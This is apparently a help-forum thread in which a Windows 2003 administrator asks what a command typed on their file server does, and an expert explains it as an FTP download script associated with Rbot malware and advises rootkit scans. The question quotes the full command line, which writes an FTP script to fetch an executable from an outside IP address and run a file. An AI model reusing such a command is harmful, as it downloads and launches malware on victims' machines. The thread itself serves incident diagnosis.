?
Solved

Command run on file server to connect to FTP Server Windows 2003 Server

Posted on 2006-10-26
3
Medium Priority
?
205 Views
Last Modified: 2010-04-18
Please help the following script was typed into the command run window by a remote user on our file server what does it do if anything


cmd.exe /c del i&echo open 88.112.47.74 7800 > i&echo  >> i &echo get e_00308.exe >> i &echo quit >> i &f

Please Help
0
Comment
Question by:guilogic
1 Comment
 
LVL 97

Accepted Solution

by:
Lee W, MVP earned 2000 total points
ID: 17812885
It means:

Delete the file "i" if it exists.
echo (write) "open 88.112.47.74 7800" to the file "i"
Then echo "get e_00308.exe" to the file "i"
Then echo "quit"" to the file "i"

then run "f"

So you end up with a file "i" on your computer containing these three lines:

open 88.112.47.74 7800
get e_00308.exe
quit

This is an FTP script.

I saw very similar files on machines infected with malware and Rbot variants (Rbots typically include Root Kit technology).

I strongly suggest you run various AntiSpyware tools AND the tool RootKitRevealer and/or Sophos Root Kit detection tool - www.sophos.com and www.sysinternals.com (for RootKitRevealer)
0

Featured Post

What does it mean to be "Always On"?

Is your cloud always on? With an Always On cloud you won't have to worry about downtime for maintenance or software application code updates, ensuring that your bottom line isn't affected.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Recently, I had the need to build a standalone system to run a point-of-sale system. I’m running this on a low-voltage Atom processor, so I wanted a light-weight operating system, but still needed Windows. I chose to use Microsoft Windows Server 200…
Scenerio: You have a server running Server 2003 and have applied a retail pack of Terminal Server Licenses.  You want to change servers or your server has crashed and you need to reapply the Terminal Server Licenses. When you enter the 16-digit lic…
We’ve all felt that sense of false security before—locking down external access to a database or component and feeling like we’ve done all we need to do to secure company data. But that feeling is fleeting. Attacks these days can happen in many w…
Is your data getting by on basic protection measures? In today’s climate of debilitating malware and ransomware—like WannaCry—that may not be enough. You need to establish more than basics, like a recovery plan that protects both data and endpoints.…

864 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question